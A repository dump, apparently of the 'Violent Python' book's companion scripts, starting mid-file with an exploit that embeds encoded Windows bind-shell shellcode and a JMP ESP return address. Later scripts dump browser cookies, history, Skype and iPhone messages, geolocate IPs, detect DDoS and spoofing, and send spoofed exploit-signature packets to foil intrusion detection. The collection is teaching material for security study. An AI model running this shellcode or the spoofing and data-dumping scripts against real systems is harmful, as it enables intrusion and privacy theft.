len(sys.argv) > 2: 22 | platform = sys.argv[2] 23 | 24 | #./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b "\x00\xff\x0d\x0a\x3d\x20" 25 | #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) 26 | 27 | shellcode = ("\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9" 28 | "\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f" 29 | "\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8" 30 | "\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7" 31 | "\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5" 32 | "\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c" 33 | "\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0" 34 | "\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49" 35 | "\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96" 36 | "\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82" 37 | "\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf" 38 | "\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41" 39 | "\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f" 40 | "\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a" 41 | "\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b" 42 | "\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a" 43 | "\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3" 44 | "\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea" 45 | "\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8" 46 | "\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6" 47 | "\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea" 48 | "\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30" 49 | "\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53" 50 | "\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85" 51 | "\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25" 52 | "\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10" 53 | "\xba\x1e\x53\x31") 54 | 55 | #7C874413 FFE4 JMP ESP kernel32.dll 56 | ret = struct.pack(' -p ') 66 | parser.add_option('-u', dest='username', type='string', 67 | help='specify wigle password') 68 | parser.add_option('-p', dest='password', type='string', 69 | help='specify wigle username') 70 | (options, args) = parser.parse_args() 71 | username = options.username 72 | password = options.password 73 | if username == None or password == None: 74 | print parser.usage 75 | exit(0) 76 | else: 77 | printNets(username, password) 78 | 79 | 80 | if __name__ == '__main__': 81 | main() 82 | -------------------------------------------------------------------------------- /CH3/2-dumpRecycleBin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import os 5 | import optparse 6 | from _winreg import * 7 | 8 | 9 | def sid2user(sid): 10 | try: 11 | key = OpenKey(HKEY_LOCAL_MACHINE, 12 | "SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" 13 | + '\\' + sid) 14 | (value, type) = QueryValueEx(key, 'ProfileImagePath') 15 | user = value.split('\\')[-1] 16 | return user 17 | except: 18 | return sid 19 | 20 | 21 | def returnDir(): 22 | dirs=['C:\\Recycler\\','C:\\Recycled\\','C:\\$Recycle.Bin\\'] 23 | for recycleDir in dirs: 24 | if os.path.isdir(recycleDir): 25 | return recycleDir 26 | return None 27 | 28 | 29 | def findRecycled(recycleDir): 30 | dirList = os.listdir(recycleDir) 31 | for sid in dirList: 32 | files = os.listdir(recycleDir + sid) 33 | user = sid2user(sid) 34 | print '\n[*] Listing Files For User: ' + str(user) 35 | for file in files: 36 | print '[+] Found File: ' + str(file) 37 | 38 | 39 | def main(): 40 | recycledDir = returnDir() 41 | findRecycled(recycledDir) 42 | 43 | 44 | if __name__ == '__main__': 45 | main() 46 | -------------------------------------------------------------------------------- /CH3/3-pdfRead.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import pyPdf 4 | import optparse 5 | from pyPdf import PdfFileReader 6 | 7 | 8 | def printMeta(fileName): 9 | pdfFile = PdfFileReader(file(fileName, 'rb')) 10 | docInfo = pdfFile.getDocumentInfo() 11 | print '[*] PDF MetaData For: ' + str(fileName) 12 | for metaItem in docInfo: 13 | print '[+] ' + metaItem + ':' + docInfo[metaItem] 14 | 15 | 16 | def main(): 17 | parser = optparse.OptionParser('usage %prog "+\ 18 | "-F ') 19 | parser.add_option('-F', dest='fileName', type='string',\ 20 | help='specify PDF file name') 21 | 22 | (options, args) = parser.parse_args() 23 | fileName = options.fileName 24 | if fileName == None: 25 | print parser.usage 26 | exit(0) 27 | else: 28 | printMeta(fileName) 29 | 30 | 31 | if __name__ == '__main__': 32 | main() 33 | -------------------------------------------------------------------------------- /CH3/4-exifFetch.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import urllib2 4 | import optparse 5 | from urlparse import urlsplit 6 | from os.path import basename 7 | from bs4 import BeautifulSoup 8 | from PIL import Image 9 | from PIL.ExifTags import TAGS 10 | 11 | 12 | def findImages(url): 13 | print '[+] Finding images on ' + url 14 | urlContent = urllib2.urlopen(url).read() 15 | soup = BeautifulSoup(urlContent) 16 | imgTags = soup.findAll('img') 17 | return imgTags 18 | 19 | 20 | def downloadImage(imgTag): 21 | try: 22 | print '[+] Dowloading image...' 23 | imgSrc = imgTag['src'] 24 | imgContent = urllib2.urlopen(imgSrc).read() 25 | imgFileName = basename(urlsplit(imgSrc)[2]) 26 | imgFile = open(imgFileName, 'wb') 27 | imgFile.write(imgContent) 28 | imgFile.close() 29 | return imgFileName 30 | except: 31 | return '' 32 | 33 | 34 | def testForExif(imgFileName): 35 | try: 36 | exifData = {} 37 | imgFile = Image.open(imgFileName) 38 | info = imgFile._getexif() 39 | if info: 40 | for (tag, value) in info.items(): 41 | decoded = TAGS.get(tag, tag) 42 | exifData[decoded] = value 43 | exifGPS = exifData['GPSInfo'] 44 | if exifGPS: 45 | print '[*] ' + imgFileName + \ 46 | ' contains GPS MetaData' 47 | except: 48 | pass 49 | 50 | 51 | def main(): 52 | parser = optparse.OptionParser('usage %prog "+\ 53 | "-u ') 54 | parser.add_option('-u', dest='url', type='string', 55 | help='specify url address') 56 | 57 | (options, args) = parser.parse_args() 58 | url = options.url 59 | if url == None: 60 | print parser.usage 61 | exit(0) 62 | else: 63 | imgTags = findImages(url) 64 | for imgTag in imgTags: 65 | imgFileName = downloadImage(imgTag) 66 | testForExif(imgFileName) 67 | 68 | 69 | if __name__ == '__main__': 70 | main() 71 | -------------------------------------------------------------------------------- /CH3/5-skypeParse.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import sqlite3 4 | import optparse 5 | import os 6 | 7 | 8 | def printProfile(skypeDB): 9 | conn = sqlite3.connect(skypeDB) 10 | c = conn.cursor() 11 | c.execute("SELECT fullname, skypename, city, country, \ 12 | datetime(profile_timestamp,'unixepoch') FROM Accounts;") 13 | 14 | for row in c: 15 | print '[*] -- Found Account --' 16 | print '[+] User : '+str(row[0]) 17 | print '[+] Skype Username : '+str(row[1]) 18 | print '[+] Location : '+str(row[2])+','+str(row[3]) 19 | print '[+] Profile Date : '+str(row[4]) 20 | 21 | 22 | def printContacts(skypeDB): 23 | conn = sqlite3.connect(skypeDB) 24 | c = conn.cursor() 25 | c.execute("SELECT displayname, skypename, city, country,\ 26 | phone_mobile, birthday FROM Contacts;") 27 | 28 | for row in c: 29 | print '\n[*] -- Found Contact --' 30 | print '[+] User : ' + str(row[0]) 31 | print '[+] Skype Username : ' + str(row[1]) 32 | 33 | if str(row[2]) != '' and str(row[2]) != 'None': 34 | print '[+] Location : ' + str(row[2]) + ',' \ 35 | + str(row[3]) 36 | if str(row[4]) != 'None': 37 | print '[+] Mobile Number : ' + str(row[4]) 38 | if str(row[5]) != 'None': 39 | print '[+] Birthday : ' + str(row[5]) 40 | 41 | 42 | def printCallLog(skypeDB): 43 | conn = sqlite3.connect(skypeDB) 44 | c = conn.cursor() 45 | c.execute("SELECT datetime(begin_timestamp,'unixepoch'), \ 46 | identity FROM calls, conversations WHERE \ 47 | calls.conv_dbid = conversations.id;" 48 | ) 49 | print '\n[*] -- Found Calls --' 50 | 51 | for row in c: 52 | print '[+] Time: '+str(row[0])+\ 53 | ' | Partner: '+ str(row[1]) 54 | 55 | 56 | def printMessages(skypeDB): 57 | conn = sqlite3.connect(skypeDB) 58 | c = conn.cursor() 59 | c.execute("SELECT datetime(timestamp,'unixepoch'), \ 60 | dialog_partner, author, body_xml FROM Messages;") 61 | print '\n[*] -- Found Messages --' 62 | 63 | for row in c: 64 | try: 65 | if 'partlist' not in str(row[3]): 66 | if str(row[1]) != str(row[2]): 67 | msgDirection = 'To ' + str(row[1]) + ': ' 68 | else: 69 | msgDirection = 'From ' + str(row[2]) + ' : ' 70 | print 'Time: ' + str(row[0]) + ' ' \ 71 | + msgDirection + str(row[3]) 72 | except: 73 | pass 74 | 75 | 76 | def main(): 77 | parser = optparse.OptionParser("usage %prog "+\ 78 | "-p ") 79 | parser.add_option('-p', dest='pathName', type='string',\ 80 | help='specify skype profile path') 81 | 82 | (options, args) = parser.parse_args() 83 | pathName = options.pathName 84 | if pathName == None: 85 | print parser.usage 86 | exit(0) 87 | elif os.path.isdir(pathName) == False: 88 | print '[!] Path Does Not Exist: ' + pathName 89 | exit(0) 90 | else: 91 | skypeDB = os.path.join(pathName, 'main.db') 92 | if os.path.isfile(skypeDB): 93 | printProfile(skypeDB) 94 | printContacts(skypeDB) 95 | printCallLog(skypeDB) 96 | printMessages(skypeDB) 97 | else: 98 | print '[!] Skype Database '+\ 99 | 'does not exist: ' + skpeDB 100 | 101 | 102 | if __name__ == '__main__': 103 | main() 104 | -------------------------------------------------------------------------------- /CH3/6-firefoxParse.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | 4 | import re 5 | import optparse 6 | import os 7 | import sqlite3 8 | 9 | 10 | def printDownloads(downloadDB): 11 | conn = sqlite3.connect(downloadDB) 12 | c = conn.cursor() 13 | c.execute('SELECT name, source, datetime(endTime/1000000,\ 14 | \'unixepoch\') FROM moz_downloads;' 15 | ) 16 | print '\n[*] --- Files Downloaded --- ' 17 | for row in c: 18 | print '[+] File: ' + str(row[0]) + ' from source: ' \ 19 | + str(row[1]) + ' at: ' + str(row[2]) 20 | 21 | 22 | def printCookies(cookiesDB): 23 | try: 24 | conn = sqlite3.connect(cookiesDB) 25 | c = conn.cursor() 26 | c.execute('SELECT host, name, value FROM moz_cookies') 27 | 28 | print '\n[*] -- Found Cookies --' 29 | for row in c: 30 | host = str(row[0]) 31 | name = str(row[1]) 32 | value = str(row[2]) 33 | print '[+] Host: ' + host + ', Cookie: ' + name \ 34 | + ', Value: ' + value 35 | except Exception, e: 36 | if 'encrypted' in str(e): 37 | print '\n[*] Error reading your cookies database.' 38 | print '[*] Upgrade your Python-Sqlite3 Library' 39 | 40 | 41 | def printHistory(placesDB): 42 | try: 43 | conn = sqlite3.connect(placesDB) 44 | c = conn.cursor() 45 | c.execute("select url, datetime(visit_date/1000000, \ 46 | 'unixepoch') from moz_places, moz_historyvisits \ 47 | where visit_count > 0 and moz_places.id==\ 48 | moz_historyvisits.place_id;") 49 | 50 | print '\n[*] -- Found History --' 51 | for row in c: 52 | url = str(row[0]) 53 | date = str(row[1]) 54 | print '[+] ' + date + ' - Visited: ' + url 55 | except Exception, e: 56 | if 'encrypted' in str(e): 57 | print '\n[*] Error reading your places database.' 58 | print '[*] Upgrade your Python-Sqlite3 Library' 59 | exit(0) 60 | 61 | 62 | def printGoogle(placesDB): 63 | conn = sqlite3.connect(placesDB) 64 | c = conn.cursor() 65 | c.execute("select url, datetime(visit_date/1000000, \ 66 | 'unixepoch') from moz_places, moz_historyvisits \ 67 | where visit_count > 0 and moz_places.id==\ 68 | moz_historyvisits.place_id;") 69 | 70 | print '\n[*] -- Found Google --' 71 | for row in c: 72 | url = str(row[0]) 73 | date = str(row[1]) 74 | if 'google' in url.lower(): 75 | r = re.findall(r'q=.*\&', url) 76 | if r: 77 | search=r[0].split('&')[0] 78 | search=search.replace('q=', '').replace('+', ' ') 79 | print '[+] '+date+' - Searched For: ' + search 80 | 81 | 82 | def main(): 83 | parser = optparse.OptionParser("usage %prog "+\ 84 | "-p " 85 | ) 86 | parser.add_option('-p', dest='pathName', type='string',\ 87 | help='specify skype profile path') 88 | 89 | (options, args) = parser.parse_args() 90 | pathName = options.pathName 91 | if pathName == None: 92 | print parser.usage 93 | exit(0) 94 | elif os.path.isdir(pathName) == False: 95 | print '[!] Path Does Not Exist: ' + pathName 96 | exit(0) 97 | else: 98 | 99 | downloadDB = os.path.join(pathName, 'downloads.sqlite') 100 | if os.path.isfile(downloadDB): 101 | printDownloads(downloadDB) 102 | else: 103 | print '[!] Downloads Db does not exist: '+downloadDB 104 | 105 | cookiesDB = os.path.join(pathName, 'cookies.sqlite') 106 | if os.path.isfile(cookiesDB): 107 | pass 108 | printCookies(cookiesDB) 109 | else: 110 | print '[!] Cookies Db does not exist:' + cookiesDB 111 | 112 | placesDB = os.path.join(pathName, 'places.sqlite') 113 | if os.path.isfile(placesDB): 114 | printHistory(placesDB) 115 | printGoogle(placesDB) 116 | else: 117 | print '[!] PlacesDb does not exist: ' + placesDB 118 | 119 | 120 | if __name__ == '__main__': 121 | main() 122 | 123 | -------------------------------------------------------------------------------- /CH3/7-iphoneMessages.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import os 4 | import sqlite3 5 | import optparse 6 | 7 | 8 | def isMessageTable(iphoneDB): 9 | try: 10 | conn = sqlite3.connect(iphoneDB) 11 | c = conn.cursor() 12 | c.execute('SELECT tbl_name FROM sqlite_master \ 13 | WHERE type==\"table\";') 14 | for row in c: 15 | if 'message' in str(row): 16 | return True 17 | except: 18 | return False 19 | 20 | 21 | def printMessage(msgDB): 22 | try: 23 | conn = sqlite3.connect(msgDB) 24 | c = conn.cursor() 25 | c.execute('select datetime(date,\'unixepoch\'),\ 26 | address, text from message WHERE address>0;') 27 | for row in c: 28 | date = str(row[0]) 29 | addr = str(row[1]) 30 | text = row[2] 31 | print '\n[+] Date: '+date+', Addr: '+addr \ 32 | + ' Message: ' + text 33 | except: 34 | pass 35 | 36 | 37 | def main(): 38 | parser = optparse.OptionParser("usage %prog "+\ 39 | "-p ") 40 | parser.add_option('-p', dest='pathName',\ 41 | type='string',help='specify skype profile path') 42 | (options, args) = parser.parse_args() 43 | 44 | pathName = options.pathName 45 | if pathName == None: 46 | print parser.usage 47 | exit(0) 48 | else: 49 | dirList = os.listdir(pathName) 50 | for fileName in dirList: 51 | iphoneDB = os.path.join(pathName, fileName) 52 | if isMessageTable(iphoneDB): 53 | try: 54 | print '\n[*] --- Found Messages ---' 55 | printMessage(iphoneDB) 56 | except: 57 | pass 58 | 59 | 60 | if __name__ == '__main__': 61 | main() 62 | -------------------------------------------------------------------------------- /CH3/firefox_profile.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH3/firefox_profile.zip -------------------------------------------------------------------------------- /CH3/skype_profile.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH3/skype_profile.zip -------------------------------------------------------------------------------- /CH4/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH4/.DS_Store -------------------------------------------------------------------------------- /CH4/1-geoIP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import pygeoip 4 | gi = pygeoip.GeoIP('/opt/GeoIP/Geo.dat') 5 | 6 | 7 | def printRecord(tgt): 8 | rec = gi.record_by_name(tgt) 9 | city = rec['city'] 10 | region = rec['region_name'] 11 | country = rec['country_name'] 12 | long = rec['longitude'] 13 | lat = rec['latitude'] 14 | print '[*] Target: ' + tgt + ' Geo-located. ' 15 | print '[+] '+str(city)+', '+str(region)+', '+str(country) 16 | print '[+] Latitude: '+str(lat)+ ', Longitude: '+ str(long) 17 | 18 | 19 | tgt = '173.255.226.98' 20 | printRecord(tgt) 21 | 22 | -------------------------------------------------------------------------------- /CH4/10-idsFoil.py: -------------------------------------------------------------------------------- 1 | import optparse 2 | from scapy.all import * 3 | from random import randint 4 | 5 | 6 | def ddosTest(src, dst, iface, count): 7 | pkt=IP(src=src,dst=dst)/ICMP(type=8,id=678)/Raw(load='1234') 8 | send(pkt, iface=iface, count=count) 9 | 10 | pkt = IP(src=src,dst=dst)/ICMP(type=0)/Raw(load='AAAAAAAAAA') 11 | send(pkt, iface=iface, count=count) 12 | 13 | pkt = IP(src=src,dst=dst)/UDP(dport=31335)/Raw(load='PONG') 14 | send(pkt, iface=iface, count=count) 15 | 16 | pkt = IP(src=src,dst=dst)/ICMP(type=0,id=456) 17 | send(pkt, iface=iface, count=count) 18 | 19 | 20 | def exploitTest(src, dst, iface, count): 21 | 22 | pkt = IP(src=src, dst=dst) / UDP(dport=518) \ 23 | /Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8") 24 | send(pkt, iface=iface, count=count) 25 | 26 | pkt = IP(src=src, dst=dst) / UDP(dport=635) \ 27 | /Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F") 28 | send(pkt, iface=iface, count=count) 29 | 30 | 31 | def scanTest(src, dst, iface, count): 32 | pkt = IP(src=src, dst=dst) / UDP(dport=7) \ 33 | /Raw(load='cybercop') 34 | send(pkt) 35 | 36 | pkt = IP(src=src, dst=dst) / UDP(dport=10080) \ 37 | /Raw(load='Amanda') 38 | send(pkt, iface=iface, count=count) 39 | 40 | 41 | def main(): 42 | parser = optparse.OptionParser('usage %prog '+\ 43 | '-i -s -t -c ' 44 | ) 45 | parser.add_option('-i', dest='iface', type='string',\ 46 | help='specify network interface') 47 | parser.add_option('-s', dest='src', type='string',\ 48 | help='specify source address') 49 | parser.add_option('-t', dest='tgt', type='string',\ 50 | help='specify target address') 51 | parser.add_option('-c', dest='count', type='int',\ 52 | help='specify packet count') 53 | 54 | (options, args) = parser.parse_args() 55 | if options.iface == None: 56 | iface = 'eth0' 57 | else: 58 | iface = options.iface 59 | if options.src == None: 60 | src = '.'.join([str(randint(1,254)) for x in range(4)]) 61 | else: 62 | src = options.src 63 | if options.tgt == None: 64 | print parser.usage 65 | exit(0) 66 | else: 67 | dst = options.tgt 68 | if options.count == None: 69 | count = 1 70 | else: 71 | count = options.count 72 | 73 | ddosTest(src, dst, iface, count) 74 | exploitTest(src, dst, iface, count) 75 | scanTest(src, dst, iface, count) 76 | 77 | 78 | if __name__ == '__main__': 79 | main() 80 | 81 | -------------------------------------------------------------------------------- /CH4/2-printDirection.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import dpkt 4 | import socket 5 | 6 | 7 | def printPcap(pcap): 8 | for (ts, buf) in pcap: 9 | try: 10 | eth = dpkt.ethernet.Ethernet(buf) 11 | ip = eth.data 12 | src = socket.inet_ntoa(ip.src) 13 | dst = socket.inet_ntoa(ip.dst) 14 | print '[+] Src: ' + src + ' --> Dst: ' + dst 15 | except: 16 | pass 17 | 18 | 19 | def main(): 20 | f = open('geotest.pcap') 21 | pcap = dpkt.pcap.Reader(f) 22 | printPcap(pcap) 23 | 24 | 25 | if __name__ == '__main__': 26 | main() 27 | 28 | -------------------------------------------------------------------------------- /CH4/3-geoPrint.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import dpkt 4 | import socket 5 | import pygeoip 6 | import optparse 7 | gi = pygeoip.GeoIP('/opt/GeoIP/Geo.dat') 8 | 9 | 10 | def retGeoStr(ip): 11 | try: 12 | rec = gi.record_by_name(ip) 13 | city = rec['city'] 14 | country = rec['country_code3'] 15 | if city != '': 16 | geoLoc = city + ', ' + country 17 | else: 18 | geoLoc = country 19 | return geoLoc 20 | except Exception, e: 21 | return 'Unregistered' 22 | 23 | 24 | def printPcap(pcap): 25 | for (ts, buf) in pcap: 26 | try: 27 | eth = dpkt.ethernet.Ethernet(buf) 28 | ip = eth.data 29 | src = socket.inet_ntoa(ip.src) 30 | dst = socket.inet_ntoa(ip.dst) 31 | print '[+] Src: ' + src + ' --> Dst: ' + dst 32 | print '[+] Src: ' + retGeoStr(src) + '--> Dst: ' \ 33 | + retGeoStr(dst) 34 | except: 35 | pass 36 | 37 | 38 | def main(): 39 | parser = optparse.OptionParser('usage %prog -p ') 40 | parser.add_option('-p', dest='pcapFile', type='string',\ 41 | help='specify pcap filename') 42 | (options, args) = parser.parse_args() 43 | if options.pcapFile == None: 44 | print parser.usage 45 | exit(0) 46 | pcapFile = options.pcapFile 47 | f = open(pcapFile) 48 | pcap = dpkt.pcap.Reader(f) 49 | printPcap(pcap) 50 | 51 | 52 | if __name__ == '__main__': 53 | main() 54 | 55 | -------------------------------------------------------------------------------- /CH4/4-googleEarthPcap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import dpkt 4 | import socket 5 | import pygeoip 6 | import optparse 7 | gi = pygeoip.GeoIP('/opt/GeoIP/Geo.dat') 8 | 9 | 10 | def retKML(ip): 11 | rec = gi.record_by_name(ip) 12 | try: 13 | longitude = rec['longitude'] 14 | latitude = rec['latitude'] 15 | kml = ( 16 | '\n' 17 | '%s\n' 18 | '\n' 19 | '%6f,%6f\n' 20 | '\n' 21 | '\n' 22 | ) %(ip,longitude, latitude) 23 | return kml 24 | except: 25 | return '' 26 | 27 | 28 | def plotIPs(pcap): 29 | kmlPts = '' 30 | for (ts, buf) in pcap: 31 | try: 32 | eth = dpkt.ethernet.Ethernet(buf) 33 | ip = eth.data 34 | src = socket.inet_ntoa(ip.src) 35 | srcKML = retKML(src) 36 | dst = socket.inet_ntoa(ip.dst) 37 | dstKML = retKML(dst) 38 | kmlPts = kmlPts + srcKML + dstKML 39 | except: 40 | pass 41 | return kmlPts 42 | 43 | 44 | def main(): 45 | parser = optparse.OptionParser('usage %prog -p ') 46 | parser.add_option('-p', dest='pcapFile', type='string',\ 47 | help='specify pcap filename') 48 | (options, args) = parser.parse_args() 49 | if options.pcapFile == None: 50 | print parser.usage 51 | exit(0) 52 | pcapFile = options.pcapFile 53 | f = open(pcapFile) 54 | pcap = dpkt.pcap.Reader(f) 55 | 56 | kmlheader = '\ 57 | \n\n\n' 58 | kmlfooter = '\n\n' 59 | kmldoc=kmlheader+plotIPs(pcap)+kmlfooter 60 | print kmldoc 61 | 62 | 63 | if __name__ == '__main__': 64 | main() 65 | 66 | -------------------------------------------------------------------------------- /CH4/5-findDDoS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import dpkt 4 | import optparse 5 | import socket 6 | THRESH = 1000 7 | 8 | 9 | def findDownload(pcap): 10 | for (ts, buf) in pcap: 11 | try: 12 | eth = dpkt.ethernet.Ethernet(buf) 13 | ip = eth.data 14 | src = socket.inet_ntoa(ip.src) 15 | tcp = ip.data 16 | http = dpkt.http.Request(tcp.data) 17 | if http.method == 'GET': 18 | uri = http.uri.lower() 19 | if '.zip' in uri and 'loic' in uri: 20 | print '[!] ' + src + ' Downloaded LOIC.' 21 | except: 22 | pass 23 | 24 | 25 | def findHivemind(pcap): 26 | for (ts, buf) in pcap: 27 | try: 28 | eth = dpkt.ethernet.Ethernet(buf) 29 | ip = eth.data 30 | src = socket.inet_ntoa(ip.src) 31 | dst = socket.inet_ntoa(ip.dst) 32 | tcp = ip.data 33 | dport = tcp.dport 34 | sport = tcp.sport 35 | if dport == 6667: 36 | if '!lazor' in tcp.data.lower(): 37 | print '[!] DDoS Hivemind issued by: '+src 38 | print '[+] Target CMD: ' + tcp.data 39 | if sport == 6667: 40 | if '!lazor' in tcp.data.lower(): 41 | print '[!] DDoS Hivemind issued to: '+src 42 | print '[+] Target CMD: ' + tcp.data 43 | except: 44 | pass 45 | 46 | 47 | def findAttack(pcap): 48 | pktCount = {} 49 | for (ts, buf) in pcap: 50 | try: 51 | eth = dpkt.ethernet.Ethernet(buf) 52 | ip = eth.data 53 | src = socket.inet_ntoa(ip.src) 54 | dst = socket.inet_ntoa(ip.dst) 55 | tcp = ip.data 56 | dport = tcp.dport 57 | if dport == 80: 58 | stream = src + ':' + dst 59 | if pktCount.has_key(stream): 60 | pktCount[stream] = pktCount[stream] + 1 61 | else: 62 | pktCount[stream] = 1 63 | except: 64 | pass 65 | 66 | for stream in pktCount: 67 | pktsSent = pktCount[stream] 68 | if pktsSent > THRESH: 69 | src = stream.split(':')[0] 70 | dst = stream.split(':')[1] 71 | print '[+] '+src+' attacked '+dst+' with ' \ 72 | + str(pktsSent) + ' pkts.' 73 | 74 | 75 | def main(): 76 | parser = optparse.OptionParser("usage %prog '+\ 77 | '-p -t " 78 | ) 79 | parser.add_option('-p', dest='pcapFile', type='string',\ 80 | help='specify pcap filename') 81 | parser.add_option('-t', dest='thresh', type='int',\ 82 | help='specify threshold count ') 83 | 84 | (options, args) = parser.parse_args() 85 | if options.pcapFile == None: 86 | print parser.usage 87 | exit(0) 88 | if options.thresh != None: 89 | THRESH = options.thresh 90 | pcapFile = options.pcapFile 91 | f = open(pcapFile) 92 | pcap = dpkt.pcap.Reader(f) 93 | findDownload(pcap) 94 | findHivemind(pcap) 95 | findAttack(pcap) 96 | 97 | 98 | if __name__ == '__main__': 99 | main() 100 | -------------------------------------------------------------------------------- /CH4/6-spoofDetect.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import time 4 | import optparse 5 | from scapy.all import * 6 | from IPy import IP as IPTEST 7 | 8 | ttlValues = {} 9 | THRESH = 5 10 | 11 | 12 | def checkTTL(ipsrc, ttl): 13 | if IPTEST(ipsrc).iptype() == 'PRIVATE': 14 | return 15 | 16 | if not ttlValues.has_key(ipsrc): 17 | pkt = sr1(IP(dst=ipsrc) / ICMP(), \ 18 | retry=0, timeout=1, verbose=0) 19 | ttlValues[ipsrc] = pkt.ttl 20 | 21 | if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH: 22 | print '\n[!] Detected Possible Spoofed Packet From: '\ 23 | + ipsrc 24 | print '[!] TTL: ' + ttl + ', Actual TTL: ' \ 25 | + str(ttlValues[ipsrc]) 26 | 27 | 28 | def testTTL(pkt): 29 | try: 30 | if pkt.haslayer(IP): 31 | ipsrc = pkt.getlayer(IP).src 32 | ttl = str(pkt.ttl) 33 | checkTTL(ipsrc, ttl) 34 | except: 35 | 36 | pass 37 | 38 | 39 | def main(): 40 | parser = optparse.OptionParser("usage %prog "+\ 41 | "-i -t ") 42 | parser.add_option('-i', dest='iface', type='string',\ 43 | help='specify network interface') 44 | parser.add_option('-t', dest='thresh', type='int', 45 | help='specify threshold count ') 46 | 47 | (options, args) = parser.parse_args() 48 | if options.iface == None: 49 | conf.iface = 'eth0' 50 | else: 51 | conf.iface = options.iface 52 | if options.thresh != None: 53 | THRESH = options.thresh 54 | else: 55 | THRESH = 5 56 | 57 | sniff(prn=testTTL, store=0) 58 | 59 | 60 | if __name__ == '__main__': 61 | main() 62 | -------------------------------------------------------------------------------- /CH4/7-testFastFlux.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | from scapy.all import * 4 | 5 | dnsRecords = {} 6 | 7 | def handlePkt(pkt): 8 | if pkt.haslayer(DNSRR): 9 | rrname = pkt.getlayer(DNSRR).rrname 10 | rdata = pkt.getlayer(DNSRR).rdata 11 | if dnsRecords.has_key(rrname): 12 | if rdata not in dnsRecords[rrname]: 13 | dnsRecords[rrname].append(rdata) 14 | else: 15 | dnsRecords[rrname] = [] 16 | dnsRecords[rrname].append(rdata) 17 | 18 | 19 | def main(): 20 | pkts = rdpcap('fastFlux.pcap') 21 | for pkt in pkts: 22 | handlePkt(pkt) 23 | 24 | for item in dnsRecords: 25 | print '[+] '+item+' has '+str(len(dnsRecords[item])) \ 26 | + ' unique IPs.' 27 | 28 | 29 | if __name__ == '__main__': 30 | main() 31 | -------------------------------------------------------------------------------- 